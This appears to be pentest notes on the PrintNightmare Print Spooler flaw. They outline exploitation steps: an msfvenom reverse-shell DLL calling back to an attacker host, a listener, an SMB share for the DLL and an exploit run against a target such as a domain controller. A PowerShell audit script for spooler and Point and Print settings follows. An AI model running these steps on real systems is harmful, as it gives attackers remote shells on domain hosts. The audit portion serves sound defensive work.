PrintNightmare (Internal/External)

Remote Code Execution

Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell.


Create payload

msfvenom -p <payload> LHOST=<kali-ip> LPORT=<port> -f dll -o file.dll


Start a listener

Could be netcat or Metasploit's multi/handler


Start an SMB server to host the malicious DLL

sudo share $PWD -smb2support


Run the exploit per the GitHub documentation

domain/user:password@target-ip-address 'malicious.dll'
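
For the scanning and mitigation side mentioned at the top, here is an added example (not from this page or from the exploit's GitHub repository) that audits the local Windows host, read-only, for the Print Spooler settings the steps above depend on. It assumes the registry value names from Microsoft's published guidance for this issue; the helper names Get-PolicyValue and Add-Finding are made up for the example.

```powershell
# Added example: read-only audit of Print Spooler exposure on the local host.
$printers = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$pnp      = Join-Path $printers 'PointAndPrint'
$findings = New-Object System.Collections.Generic.List[object]

function Get-PolicyValue {
    param([string]$Path, [string]$Name)
    # Yields nothing ($null) when the key or the value is not defined.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $item) { $item.$Name }
}

function Add-Finding {
    param([string]$Check, $Value, [bool]$Ok, [string]$Note)
    $shown = if ($null -eq $Value) { '(not set)' } else { $Value }
    $findings.Add([pscustomobject]@{
        Check = $Check; Value = $shown; OK = $Ok; Note = $Note })
}

# 1. Spooler service: should be stopped and disabled wherever printing is
#    not needed (the page singles out domain controllers as a target).
$svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
if ($null -eq $svc) {
    Add-Finding 'Spooler service' 'not installed' $true 'Nothing to exploit'
} else {
    $ok = ($svc.Status -ne 'Running') -and ($svc.StartType -eq 'Disabled')
    Add-Finding 'Spooler service' "$($svc.Status)/$($svc.StartType)" $ok `
        'Stop and disable if this host does not need to print'
}

# 2. Inbound remote printing: 2 = spooler refuses remote client connections.
$v = Get-PolicyValue $printers 'RegisterSpoolerRemoteRpcEndPoint'
Add-Finding 'RegisterSpoolerRemoteRpcEndPoint' $v ($v -eq 2) `
    '2 blocks the remote path; local printing still works'

# 3. Point and Print prompts: both values must be 0 or not defined.
foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
    $v = Get-PolicyValue $pnp $name
    Add-Finding $name $v (($null -eq $v) -or ($v -eq 0)) 'Must be 0 or not set'
}

# 4. Driver installation limited to administrators (conservative: wants 1).
$v = Get-PolicyValue $pnp 'RestrictDriverInstallationToAdministrators'
Add-Finding 'RestrictDriverInstallationToAdministrators' $v ($v -eq 1) `
    'Set explicitly to 1; unset depends on the installed update level'

$findings | Format-Table -AutoSize -Wrap
```

A row with OK = False is a prompt to review that setting, not proof of exploitability; patch level still has to be checked separately.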